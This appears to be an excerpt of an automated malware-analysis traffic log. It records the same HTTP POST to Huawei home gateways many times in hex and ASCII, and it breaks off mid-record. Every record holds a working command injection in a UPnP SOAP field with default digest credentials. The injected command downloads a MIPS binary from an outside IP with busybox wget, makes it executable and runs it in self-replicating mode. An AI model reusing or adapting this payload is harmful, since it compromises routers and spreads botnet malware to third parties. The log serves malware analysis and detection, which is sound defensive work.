74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 